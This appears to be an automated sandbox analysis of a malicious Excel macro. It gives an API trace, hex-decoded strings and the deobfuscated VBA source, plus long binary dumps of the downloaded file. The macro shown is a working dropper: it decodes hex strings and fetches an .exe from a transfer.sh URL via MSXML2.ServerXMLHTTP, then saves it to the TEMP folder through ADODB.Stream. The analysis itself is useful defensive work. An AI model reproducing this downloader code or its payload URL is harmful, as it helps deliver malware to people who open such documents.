Part of subcall function wyfqtgmzehxe@ThisWorkbook: Val
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Mid$
setOption
Open	IServerXMLHTTPRequest2.Open("GET","https://transfer.sh/Uv5XFY/0000.LPCD2022.exe",False)
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Len
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Chr$
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Val
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Mid$
setRequestHeader	IServerXMLHTTPRequest2.setRequestHeader("User-Agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)")
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Len
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Chr$
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Val
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Mid$
Send
Status	IServerXMLHTTPRequest2.Status() -> 200
CreateObject	CreateObject("ADODB.Stream")
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Len
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Chr$
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Val
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Mid$
Open	Stream.Open()
Type
Write	Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdDc0?\x08?\x00\x00\x00?\x08 \x00?\x08\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x08?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x08K\x00?\x08?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x08 \x00?\x08?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x00\x00H\x00\x02\x05?\x00?\x00\x03\x00O??\x01?\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?Z\x00??\x01\x00??\x01???\xfffd??\x00???\x02?8\x00?\x00??\x00??\x01\x00??\x03???\xfffd??\x00???\x04?8\x00?\x00?\x03p\x00\x01??\x00?\x00\x00?\x10? \x00??\x00??\x00????\x00N\x00?\x00?\x00??\x06??\x00\x00??\x00???????\x00???\x00^?\x00????\x02\x00????\x11??\x00???F???\x00?\x00\x00?\x00?\x04\xfffd\x00\x02?G\x00???\x00\x00?\x04?\x00?\x00?\x00?t\x00?\x00?\x1f\x00??\x10?\x13 \x00?\x13?????????\xfffd??\x05??\x07??\x00\x00\x00??\x11??\x12?"\x00????\x00\x00d??\x00?????\xfffd??\x01??\x03??\x00\x00\x00??\x11??\x14?"\x00???????\x04\xfffd\x00\x03??\x00???\x01\x00\x14\x00?\x00\x00^?\x00??\x1a\x00d??\x01??\x00\x00?\x00??\x00??\x00??\x14?"\x00??\x11?I\x00??\x00?#\x00\x00\x00???\x00\x00??\x00??\x12?"\x00??\x11??\x00??\x00?#\x00\x00\x00?? \x00\x00?\x00?o??e???\x05?\x00\x04??\x00?\x0c?\x01\x00s\x00?\x00\x00^?\x00??\x00??\x03??d???\x00 \x00\x00?\x00???????I\x00?????\x02???\xfffd??\x00?????\x08???\xfffd??\x00?????\x06???\xfffd?\x04\xfffd\x00\x05??\x00???\x01\x00t\x00?\x00\x00??\x00???\x00?????\x05?d?\x06???\xfffd?\x03??\x01???#\x00\x00??\x138\x00??\x00??\x00???\x00\x00\x00???\x15\x00??\x03?\x11?\x04?????\x01?\x11?\x02? \x00?\x12??????\xfffd?\x04g\x00\x06??\x00?\x05\x008\x00??\x11d?\x00????d?\x00??\x07??\x05???\x00??????\x14???\x00?I\x00??\x18?\x13??\xfffd?\x03N\x00\x07??\x00???\x00\x00?\x02?\x00?\x00?\x01?\x00?\x01?\xfffd\x00??\x00??]\x00`?\x1c?\x13G\x00?\x13???? \x00?????\x00????d??\x00?\x00\x00\x00\x00???\x00?\x12?????????\x1d?#\x00\x00\x00???o\x00?\x00???????????\x1b????????\x00??\x1b?? \x00?\x13???? \x00?.?\x11??\x00??\x1b??\x16??????d???????????\x1c?e??\xfffd?\x05???\x00?\x05?\x1e?\x02?>?\x00?\x01?\x00?.?\x00?\x00???\x00??\x01\x00??\x06???\xfffd??\x00???\x07?8\x00?\x00?\x045\x00\x08???\x00??\x00??\x19??\x19???\x00??\x00\x00?\x00?\x00\x00\x11\x00?\x04J\x00\x00\x00Z\x00?\x00\x00?\x10?8\x00\x00??\xfffd??\xfffd??\x18??\x00\x00??\x00\xfffd?\x00??\x00???\x00?\x045\x00\x08??\x00????\x00??\x00??\x19??\x19??\x138\x00?????\xfffd\x00?\x040\x00\x08???\x00??\x00??"??\x17??\x138\x00?\x05\x008\x00???\x08???\x00?\x08?\x1e?\x02?? ?\x19??\x03?\x00 ?G\x00?\x0e?\x00\x00?\x00?\x00?\x00?\x00?S\x00? ?e8\x00?M\x00?\x00\x00? ??? \x00\x00?\x00???\xfffd\x00\x00???? ??\x00? ???????????\x00?\x04?\x00\x01??\x02?\x00\x00?\x10? \x00??\x00? \x00? \x00???\x0c?\x01\x00!\x00?\x00??\xfffd??\x01??\x00?\x0c??\x00\x00??\xfffd??\x01??\x00? ?8\x00??\xfffd??\x01??\x00?\x0b????? ???\x00? ???\x00??\x01\x00??\x0e???\xfffd??\x00???\x0f?\x00?\x05?\x00 ??\x02?\x00\x00?\x10??\x00????\x00?\x00?\x01?\x01??\x00??#??\x00??\x00?\xfffd??\x1c??\x00??\x1d??\x00?\x1e??\x01?(??\x00??\x14\x00?\x00??\x07\x00?\x01\x00\x00??\x1f?U\x00? ??????#??\x00??\x00?\xfffd??\x1c??\x00??\x1d??\x00????\x00?i??\x01?\x02??\x00????????k??\x1b??\x00?\x12??\x17\x00?\x11??2??\x00??\x00?\x03??\x00??8\x00\x00?)??\x00??\x00??\x00??\x00?%??\x13??\x00? \x01\x00??????d?\x00?i??\x01?\x06??\x00??\x00?\x17\x00?\x11??4??\x00??\x00?\x07?? \x00???? \x00?????\x00??\xfffd??\x00??\x00?\x17\x00?\x11??5??\x00??\x00?\x08??\x00??????\xfffd???\x00?\x16??\x17\x00?\x11??6??\x00??\x00?\x08??\x00????\x00?\x10???\x00?\x10?? ?#?? ?\xfffd???\x00???\x18?\x00??\x00???\x19?\x00??\x00???\x1a?8\x00?\x00??\x00???\x1b?\x00??\x00???\x1c?\x00??\x00???\x1d?\x00??\x00???\x1e?\x00??\x00???\x1f?\x00?O?8\x00??\x00?\x00\x00\x00?+??\x00?\x00\x00?\x00?\x06?\x00\x0b??\x00?\x00\x00?J??\x01????\x01?\x00?\x02?\x02?\x01?\x01?\x00?\x00??\x00???\x01??#\x00G\x00????????? ???????\x00???\x01??\x00????\x01??\x00?-??\x00?j\x00?\xfffd???\x00? \x04\x00??\xfffd??\xfffd???\x00?E??\x01?? ???\x00\x00????\xfffd\x00?E???\x00??\x1d??\x00?#\x00\x00???\x00??\xfffd????\x00?\xfffd??\x00\x00\x00??\xfffd???\x00???????'??\x00?D????^?\x00??L??\x00?]??\x00??\xfffd???\x00?;??\x00??\xfffd\x00?\x00\x00??\xfffd???\x00?A??????\x00?1????\x00\x00?????\xfffd??\xfffd???\x00?G??\x00?????\xfffd??a??<???\x00???^?\x00?p???\x00?I? \x00???? \x00???????\x02\x00??????`?\x00?"??\x17\x00?!??T??\x00??\x00?\x0b?\x13??\xfffd?\xfffd??\x00??\x00??\x00??\x00?4??#??\x00????\x00?\x04?\x00\x0c??\x00???\x00\x04??[??\x00?\x0b?\xfffd?? ???\x00`?\x00??\x00??\x00??\x00?4??$??\x00?????\x00??\x00?6???\x00???\x00???\x00\x00?? ???\x00? ?\x1e?\x02?? ?\xfffd?? ?\xfffd???\x00???(?\x00]\x03l\x00 ??\x02?\x00\x00?\x10??\x01????\x01N\x00?\x01?e\x00?\xfffd\x00?\x00???\x01\x009\x00?\x00??7??8\x00\x00??\xfffd??\x00? \x00\x00???\xfffd\x00\x00??\xfffd?\x00?\x13\x00\x00??\x00?\x05\x00?\x00??:??8\x00\x00?^???\x00?;????\x19\x00??\x0f??\x00?\x00\x00?8\x00\x00\x12?\x00?}?8\x00?K\x00\x12?\x0e??\x00?\x00\x00? \x00????X?\xfffd`?\x00?>?\x13??\xfffd??\x00?_????\x00?\x00\x02~??\x00\x00\x02-??\x00\x00?)???\x00?)??\x04\x1f\x00\x0e?????\x00??\x03\x00\x11?????\xfffd?\x06\xfffd\x00\x0f??\x00?\x0c?\x02\x00\x05\x00V\x008\x00?????\x00????\x00\x00d?e \x00?h??????\xfffd?d?\xfffd??????\x00??4\x00?\x00?2\x00??G\x00?g????G\x00???????????????\x02%\x00\x10??\x00?\x18\x00?\x00\x00?c??\x00????\x11\x00?\x04?\x00\x11??A??B???:\x00?????\x1b\x00??C??\x00 ?E?\x00?\x00\x00???\x00 \x00???????????\x00?????\x00??C??\x00 ??\x00\x00?????\x00????\x00???+?8\x00?\x00??\x00???,?\x00]\x04s\x00\x12??\x00?C?\x01\x00\x05\x008\x00?\x05\x008\x00??\x11? \x00?p???? \x00?????\x00?? \x00?n?\x13??\xfffd??I???\x00??r??\x00\x00???u??\x00?)\x00?\x02N\x00?\x00?\x0b\x00?E\x00?\x00??\x17\x00?\x00\x00\x11?\x00?l???\xfffd\x11?\x00??i???\x00?K?8\x00\x00??L????? \x00?o???? \x00????s???\x00?\x00\x00??\x00?\x00\x00???\xfffd?????\x00?\x00\x00??\x00?\x00\x00???\xfffd?\x00\x02z??\x00\x00\x02^??\x00\x00???8\x00??\x00?\x00\x00??-???\x00?-?? ?<?? ?M???\x00??\x01\x00??.???\xfffd]\x07?\x00\x13??\x02???\x01\x00?\x00?\x03\x00?\x02?R\x00?\x02?\x00?\x01?\x01?\x00?\x02?\x00?l\x00????\x00?\xfffd???\x00? \x03\x00?\x00???\xfffd\x02\x00??\xfffd??\x00?v??\x00???O??\x00 \x02\x00?\x00?????????\x00?\xfffd??\x00???\x00?T\x00 \x00?z????????0???\x00?\xfffd??Q??,A???R??????\x00? ??\x00?\xfffd???\xfffd??\x00?~???\x00??\x04\x00\x05\x00X\x00???\x00?\x00???0??\x00?\x0f??\x00?\x11\x00?\x00??\x04\x00??\xfffd?\x00 \x01\x00?\x00???????\x00????\x00?I?????\xfffd?\x00?b\x00??0??\x00?????\x00??0??\x00??\x00??\x00??\x00????\x00???\x00?S??\x00?\x0e??\x00?????V????s\x00??0????\x00?????\x00???N??\x00?\xfffd??\x00??0???,A???}??\x00?\xfffd???\xfffd??\x00???\xfffd????}\x00d?\x00?\x00\x00d?\x00?\x00\x00??\x00???\x01 \x00\x00?\x00???????\x00?\x1a\x00?y???\x00?\|????????a??\x00?W?e???????\x00?\x00\x02\x00\x18\x00?\x00?\x00\x1a\x00\x00\x00?\x06?\x00\x14??\x01???\x10\x00?\x00\x12\x00?\x00o\x00?\x00?\x00\xfffd\x00?\x00?\x00?\x00\xfffd\x00u\x00?\x00?\x00?\x00?\x00?\x01???\x00?g\x00??\x02?\xfffd\x00? \x04\x00??\xfffd??????\x00????\x00?\x7f??\x00?,\x00?\x03??\x00???? \x00?z?????\x00?[??????\x00?\x03??\x00???\x01?\\x00?\x00???\x02????\x00?\x03????\x00?\x02????\x01 \x00??????\x00??\x00?1\x00?\x02?L\x00\x11?Z?????\x01\x00?\xfffd??\x11?\x13???u\x00?\x00???\x00?\x03??\x11?\x00??Y?\x13???\xfffd\x00?\x00?????????\x00?\x02???\x00?????\x01????\x00? \x0e\x00?????Z????????\x00??\x00?\x01\x00???\x00?I\x00?????????\x00?????\x02??\x00???\x00??\xfffd\x01\x00?\x00????????\x00??^????\x00????\x00????\xfffd???\x00?\x08\x00??\xfffd?\xfffd???\x00???a??\x00?H\x00??\x00??\x00?b?????O\x00????\x06\x00?????\x00\x00???\x00??\x00?\x00????\x00?z\x00???????V????\x00?????????\x00????????\x00\x00??\x00????\x01???\x00????\x00???????\x00?i\x00??????? \x0f\x00?\x00???????\x00??\xfffd\x00?\x00?e????\x00?A\x00?????\x00?????????\x00??????????????Z???\x00 \x00\x00?\x00?????????\x05\x00????????????????\xfffd?????Z?????\x00??)
ResponseBody	IServerXMLHTTPRequest2.ResponseBody() -> ?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdDc0?\x08?\x00\x00\x00?\x08 \x00?\x08\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x08?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x08K\x00?\x08?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x08 \x00?\x08?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x00\x00H\x00\x02\x05?\x00?\x00\x03\x00O??\x01?\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?Z\x00??\x01\x00??\x01???\xfffd??\x00???\x02?8\x00?\x00??\x00??\x01\x00??\x03???\xfffd??\x00???\x04?8\x00?\x00?\x03p\x00\x01??\x00?\x00\x00?\x10? \x00??\x00??\x00????\x00N\x00?\x00?\x00??\x06??\x00\x00??\x00???????\x00???\x00^?\x00????\x02\x00????\x11??\x00???F???\x00?\x00\x00?\x00?\x04\xfffd\x00\x02?G\x00???\x00\x00?\x04?\x00?\x00?\x00?t\x00?\x00?\x1f\x00??\x10?\x13 \x00?\x13?????????\xfffd??\x05??\x07??\x00\x00\x00??\x11??\x12?"\x00????\x00\x00d??\x00?????\xfffd??\x01??\x03??\x00\x00\x00??\x11??\x14?"\x00???????\x04\xfffd\x00\x03??\x00???\x01\x00\x14\x00?\x00\x00^?\x00??\x1a\x00d??\x01??\x00\x00?\x00??\x00??\x00??\x14?"\x00??\x11?I\x00??\x00?#\x00\x00\x00???\x00\x00??\x00??\x12?"\x00??\x11??\x00??\x00?#\x00\x00\x00?? \x00\x00?\x00?o??e???\x05?\x00\x04??\x00?\x0c?\x01\x00s\x00?\x00\x00^?\x00??\x00??\x03??d???\x00 \x00\x00?\x00???????I\x00?????\x02???\xfffd??\x00?????\x08???\xfffd??\x00?????\x06???\xfffd?\x04\xfffd\x00\x05??\x00???\x01\x00t\x00?\x00\x00??\x00???\x00?????\x05?d?\x06???\xfffd?\x03??\x01???#\x00\x00??\x138\x00??\x00??\x00???\x00\x00\x00???\x15\x00??\x03?\x11?\x04?????\x01?\x11?\x02? \x00?\x12??????\xfffd?\x04g\x00\x06??\x00?\x05\x008\x00??\x11d?\x00????d?\x00??\x07??\x05???\x00??????\x14???\x00?I\x00??\x18?\x13??\xfffd?\x03N\x00\x07??\x00???\x00\x00?\x02?\x00?\x00?\x01?\x00?\x01?\xfffd\x00??\x00??]\x00`?\x1c?\x13G\x00?\x13???? \x00?????\x00????d??\x00?\x00\x00\x00\x00???\x00?\x12?????????\x1d?#\x00\x00\x00???o\x00?\x00???????????\x1b????????\x00??\x1b?? \x00?\x13???? \x00?.?\x11??\x00??\x1b??\x16??????d???????????\x1c?e??\xfffd?\x05???\x00?\x05?\x1e?\x02?>?\x00?\x01?\x00?.?\x00?\x00???\x00??\x01\x00??\x06???\xfffd??\x00???\x07?8\x00?\x00?\x045\x00\x08???\x00??\x00??\x19??\x19???\x00??\x00\x00?\x00?\x00\x00\x11\x00?\x04J\x00\x00\x00Z\x00?\x00\x00?\x10?8\x00\x00??\xfffd??\xfffd??\x18??\x00\x00??\x00\xfffd?\x00??\x00???\x00?\x045\x00\x08??\x00????\x00??\x00??\x19??\x19??\x138\x00?????\xfffd\x00?\x040\x00\x08???\x00??\x00??"??\x17??\x138\x00?\x05\x008\x00???\x08???\x00?\x08?\x1e?\x02?? ?\x19??\x03?\x00 ?G\x00?\x0e?\x00\x00?\x00?\x00?\x00?\x00?S\x00? ?e8\x00?M\x00?\x00\x00? ??? \x00\x00?\x00???\xfffd\x00\x00???? ??\x00? ???????????\x00?\x04?\x00\x01??\x02?\x00\x00?\x10? \x00??\x00? \x00? \x00???\x0c?\x01\x00!\x00?\x00??\xfffd??\x01??\x00?\x0c??\x00\x00??\xfffd??\x01??\x00? ?8\x00??\xfffd??\x01??\x00?\x0b????? ???\x00? ???\x00??\x01\x00??\x0e???\xfffd??\x00???\x0f?\x00?\x05?\x00 ??\x02?\x00\x00?\x10??\x00????\x00?\x00?\x01?\x01??\x00??#??\x00??\x00?\xfffd??\x1c??\x00??\x1d??\x00?\x1e??\x01?(??\x00??\x14\x00?\x00??\x07\x00?\x01\x00\x00??\x1f?U\x00? ??????#??\x00??\x00?\xfffd??\x1c??\x00??\x1d??\x00????\x00?i??\x01?\x02??\x00????????k??\x1b??\x00?\x12??\x17\x00?\x11??2??\x00??\x00?\x03??\x00??8\x00\x00?)??\x00??\x00??\x00??\x00?%??\x13??\x00? \x01\x00??????d?\x00?i??\x01?\x06??\x00??\x00?\x17\x00?\x11??4??\x00??\x00?\x07?? \x00???? \x00?????\x00??\xfffd??\x00??\x00?\x17\x00?\x11??5??\x00??\x00?\x08??\x00??????\xfffd???\x00?\x16??\x17\x00?\x11??6??\x00??\x00?\x08??\x00????\x00?\x10???\x00?\x10?? ?#?? ?\xfffd???\x00???\x18?\x00??\x00???\x19?\x00??\x00???\x1a?8\x00?\x00??\x00???\x1b?\x00??\x00???\x1c?\x00??\x00???\x1d?\x00??\x00???\x1e?\x00??\x00???\x1f?\x00?O?8\x00??\x00?\x00\x00\x00?+??\x00?\x00\x00?\x00?\x06?\x00\x0b??\x00?\x00\x00?J??\x01????\x01?\x00?\x02?\x02?\x01?\x01?\x00?\x00??\x00???\x01??#\x00G\x00????????? ???????\x00???\x01??\x00????\x01??\x00?-??\x00?j\x00?\xfffd???\x00? \x04\x00??\xfffd??\xfffd???\x00?E??\x01?? ???\x00\x00????\xfffd\x00?E???\x00??\x1d??\x00?#\x00\x00???\x00??\xfffd????\x00?\xfffd??\x00\x00\x00??\xfffd???\x00???????'??\x00?D????^?\x00??L??\x00?]??\x00??\xfffd???\x00?;??\x00??\xfffd\x00?\x00\x00??\xfffd???\x00?A??????\x00?1????\x00\x00?????\xfffd??\xfffd???\x00?G??\x00?????\xfffd??a??<???\x00???^?\x00?p???\x00?I? \x00???? \x00???????\x02\x00??????`?\x00?"??\x17\x00?!??T??\x00??\x00?\x0b?\x13??\xfffd?\xfffd??\x00??\x00??\x00??\x00?4??#??\x00????\x00?\x04?\x00\x0c??\x00???\x00\x04??[??\x00?\x0b?\xfffd?? ???\x00`?\x00??\x00??\x00??\x00?4??$??\x00?????\x00??\x00?6???\x00???\x00???\x00\x00?? ???\x00? ?\x1e?\x02?? ?\xfffd?? ?\xfffd???\x00???(?\x00]\x03l\x00 ??\x02?\x00\x00?\x10??\x01????\x01N\x00?\x01?e\x00?\xfffd\x00?\x00???\x01\x009\x00?\x00??7??8\x00\x00??\xfffd??\x00? \x00\x00???\xfffd\x00\x00??\xfffd?\x00?\x13\x00\x00??\x00?\x05\x00?\x00??:??8\x00\x00?^???\x00?;????\x19\x00??\x0f??\x00?\x00\x00?8\x00\x00\x12?\x00?}?8\x00?K\x00\x12?\x0e??\x00?\x00\x00? \x00????X?\xfffd`?\x00?>?\x13??\xfffd??\x00?_????\x00?\x00\x02~??\x00\x00\x02-??\x00\x00?)???\x00?)??\x04\x1f\x00\x0e?????\x00??\x03\x00\x11?????\xfffd?\x06\xfffd\x00\x0f??\x00?\x0c?\x02\x00\x05\x00V\x008\x00?????\x00????\x00\x00d?e \x00?h??????\xfffd?d?\xfffd??????\x00??4\x00?\x00?2\x00??G\x00?g????G\x00???????????????\x02%\x00\x10??\x00?\x18\x00?\x00\x00?c??\x00????\x11\x00?\x04?\x00\x11??A??B???:\x00?????\x1b\x00??C??\x00 ?E?\x00?\x00\x00???\x00 \x00???????????\x00?????\x00??C??\x00 ??\x00\x00?????\x00????\x00???+?8\x00?\x00??\x00???,?\x00]\x04s\x00\x12??\x00?C?\x01\x00\x05\x008\x00?\x05\x008\x00??\x11? \x00?p???? \x00?????\x00?? \x00?n?\x13??\xfffd??I???\x00??r??\x00\x00???u??\x00?)\x00?\x02N\x00?\x00?\x0b\x00?E\x00?\x00??\x17\x00?\x00\x00\x11?\x00?l???\xfffd\x11?\x00??i???\x00?K?8\x00\x00??L????? \x00?o???? \x00????s???\x00?\x00\x00??\x00?\x00\x00???\xfffd?????\x00?\x00\x00??\x00?\x00\x00???\xfffd?\x00\x02z??\x00\x00\x02^??\x00\x00???8\x00??\x00?\x00\x00??-???\x00?-?? ?<?? ?M???\x00??\x01\x00??.???\xfffd]\x07?\x00\x13??\x02???\x01\x00?\x00?\x03\x00?\x02?R\x00?\x02?\x00?\x01?\x01?\x00?\x02?\x00?l\x00????\x00?\xfffd???\x00? \x03\x00?\x00???\xfffd\x02\x00??\xfffd??\x00?v??\x00???O??\x00 \x02\x00?\x00?????????\x00?\xfffd??\x00???\x00?T\x00 \x00?z????????0???\x00?\xfffd??Q??,A???R??????\x00? ??\x00?\xfffd???\xfffd??\x00?~???\x00??\x04\x00\x05\x00X\x00???\x00?\x00???0??\x00?\x0f??\x00?\x11\x00?\x00??\x04\x00??\xfffd?\x00 \x01\x00?\x00???????\x00????\x00?I?????\xfffd?\x00?b\x00??0??\x00?????\x00??0??\x00??\x00??\x00??\x00????\x00???\x00?S??\x00?\x0e??\x00?????V????s\x00??0????\x00?????\x00???N??\x00?\xfffd??\x00??0???,A???}??\x00?\xfffd???\xfffd??\x00???\xfffd????}\x00d?\x00?\x00\x00d?\x00?\x00\x00??\x00???\x01 \x00\x00?\x00???????\x00?\x1a\x00?y???\x00?\|????????a??\x00?W?e???????\x00?\x00\x02\x00\x18\x00?\x00?\x00\x1a\x00\x00\x00?\x06?\x00\x14??\x01???\x10\x00?\x00\x12\x00?\x00o\x00?\x00?\x00\xfffd\x00?\x00?\x00?\x00\xfffd\x00u\x00?\x00?\x00?\x00?\x00?\x01???\x00?g\x00??\x02?\xfffd\x00? \x04\x00??\xfffd??????\x00????\x00?\x7f??\x00?,\x00?\x03??\x00???? \x00?z?????\x00?[??????\x00?\x03??\x00???\x01?\\x00?\x00???\x02????\x00?\x03????\x00?\x02????\x01 \x00??????\x00??\x00?1\x00?\x02?L\x00\x11?Z?????\x01\x00?\xfffd??\x11?\x13???u\x00?\x00???\x00?\x03??\x11?\x00??Y?\x13???\xfffd\x00?\x00?????????\x00?\x02???\x00?????\x01????\x00? \x0e\x00?????Z????????\x00??\x00?\x01\x00???\x00?I\x00?????????\x00?????\x02??\x00???\x00??\xfffd\x01\x00?\x00????????\x00??^????\x00????\x00????\xfffd???\x00?\x08\x00??\xfffd?\xfffd???\x00???a??\x00?H\x00??\x00??\x00?b?????O\x00????\x06\x00?????\x00\x00???\x00??\x00?\x00????\x00?z\x00???????V????\x00?????????\x00????????\x00\x00??\x00????\x01???\x00????\x00???????\x00?i\x00??????? \x0f\x00?\x00???????\x00??\xfffd\x00?\x00?e????\x00?A\x00?????\x00?????????\x00??????????????Z???\x00 \x00\x00?\x00?????????\x05\x00????????????????\xfffd?????Z?????\x00??
SaveToFile
Close
Part of subcall function qgssfhxdi@dogbdtbkc: Clear
Part of subcall function qgssfhxdi@dogbdtbkc: Number
Part of subcall function qgssfhxdi@dogbdtbkc: Err
Part of subcall function qgssfhxdi@dogbdtbkc: Clear

Strings	Decrypted Strings
"68"	"h"
"64726f"	"dro"
"TEMP"
"4d53584d4c322e5365727665"	"MSXML2.Serve"
"474554"	"GET"
"4d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e542035"	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5"
"557365722d"	"User-"
"4144"	"AD"
"4144"	"AD"

Line	Instruction	Meta Information
9	Private Sub cjpojbxatghyew()
10	Dim xoiiovcnqn as String	executed
11	Dim xdgiejom as String
12	Dim nvezeahcpysxmsykuzbe as Object, mclnjwgjqaeyhh as Object
13	Dim eycdwsxiwe as Integer
14	xoiiovcnqn = wyfqtgmzehxe("68") & wyfqtgmzehxe("747470733a2f2f7472616e736665722e73682f5576355846592f303030302e4c504344323032322e657865")	executed
15	xdgiejom = wyfqtgmzehxe("64726f") & wyfqtgmzehxe("707065642e657865")	executed
16	xdgiejom = Environ("TEMP") & "\" & xdgiejom	Environ("TEMP") -> C:\Users\Albus\AppData\Local\Temp executed
17	Set nvezeahcpysxmsykuzbe = CreateObject(wyfqtgmzehxe("4d53584d4c322e5365727665") & wyfqtgmzehxe("72584d4c485454502e362e30"))	CreateObject("MSXML2.ServerXMLHTTP.6.0") executed
18	nvezeahcpysxmsykuzbe.setOption(2) = 13056	setOption
19	nvezeahcpysxmsykuzbe.Open wyfqtgmzehxe("474554"), xoiiovcnqn, False	IServerXMLHTTPRequest2.Open("GET","https://transfer.sh/Uv5XFY/0000.LPCD2022.exe",False) executed
20	nvezeahcpysxmsykuzbe.setRequestHeader wyfqtgmzehxe("557365722d") & wyfqtgmzehxe("4167656e74"), wyfqtgmzehxe("4d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e542035") & wyfqtgmzehxe("2e3029")	IServerXMLHTTPRequest2.setRequestHeader("User-Agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)") executed
21	nvezeahcpysxmsykuzbe.Send	Send
22	If nvezeahcpysxmsykuzbe.Status = 200 Then	IServerXMLHTTPRequest2.Status() -> 200 executed
23	Set mclnjwgjqaeyhh = CreateObject(wyfqtgmzehxe("4144") & wyfqtgmzehxe("4f44422e53747265616d"))	CreateObject("ADODB.Stream") executed
24	mclnjwgjqaeyhh.Open	Stream.Open() executed
25	mclnjwgjqaeyhh.Type = 1	Type
26	mclnjwgjqaeyhh.Write nvezeahcpysxmsykuzbe.ResponseBody	Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdDc0?\x08?\x00\x00\x00?\x08 \x00?\x08\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x08?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x08K\x00?\x08?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x08 \x00?\x08?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x00\x00H\x00\x02\x05?\x00?\x00\x03\x00O??\x01?\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?Z\x00??\x01\x00??\x01???\xfffd??\x00???\x02?8\x00?\x00??\x00??\x01\x00??\x03???\xfffd??\x00???\x04?8\x00?\x00?\x03p\x00\x01??\x00?\x00\x00?\x10? \x00??\x00??\x00????\x00N\x00?\x00?\x00??\x06??\x00\x00??\x00???????\x00???\x00^?\x00????\x02\x00????\x11??\x00???F???\x00?\x00\x00?\x00?\x04\xfffd\x00\x02?G\x00???\x00\x00?\x04?\x00?\x00?\x00?t\x00?\x00?\x1f\x00??\x10?\x13 \x00?\x13?????????\xfffd??\x05??\x07??\x00\x00\x00??\x11??\x12?"\x00????\x00\x00d??\x00?????\xfffd??\x01??\x03??\x00\x00\x00??\x11??\x14?"\x00???????\x04\xfffd\x00\x03??\x00???\x01\x00\x14\x00?\x00\x00^?\x00??\x1a\x00d??\x01??\x00\x00?\x00??\x00??\x00??\x14?"\x00??\x11?I\x00??\x00?#\x00\x00\x00???\x00\x00??\x00??\x12?"\x00??\x11??\x00??\x00?#\x00\x00\x00?? \x00\x00?\x00?o??e???\x05?\x00\x04??\x00?\x0c?\x01\x00s\x00?\x00\x00^?\x00??\x00??\x03??d???\x00 